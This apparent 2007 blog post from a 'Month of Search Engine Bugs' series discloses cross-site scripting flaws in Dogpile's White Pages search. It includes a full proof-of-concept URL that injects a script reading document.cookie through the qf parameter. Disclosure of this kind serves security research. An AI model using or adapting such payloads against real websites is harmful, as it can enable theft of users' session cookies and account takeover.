MOSEB-21: Vulnerabilities at www.dogpile.com

17:16 23.06.2007

Last two days my site didn’t work. Because of hardware failure at server - the hard drive at server was broke :-( . Now after the problem have been fixed (and my site moved to new server) my project continue to work in usual routine. Don’t worry, every post for every day of MOSEB will be posted as I planned (there will be no gaps). No one search engine vendor can’t hide from the truth.

Next participant of the project is Dogpile search engine. It is one of the popular meta search engines.

The vulnerabilities are at Dogpile Web Search (www.dogpile.com) in White Pages search. These Cross-Site Scripting holes I found 27.05.2007.

XSS:

The vulnerabilities are in qf and qn parameters:
http://www.dogpile.com/info.dogpl/white-pages/message.htm?otmpl=/white-pages/results.htm&qf=%27%3Cscript%3Ealert(document.cookie)%3C/script%3E&searchtype=citystate

Moral: searching in white pages can be risky.

Note, that Dogpile engine belongs to InfoSpace, Inc. So they also responsible for these vulnerabilities.


Leave a Reply

You must be logged in to post a comment.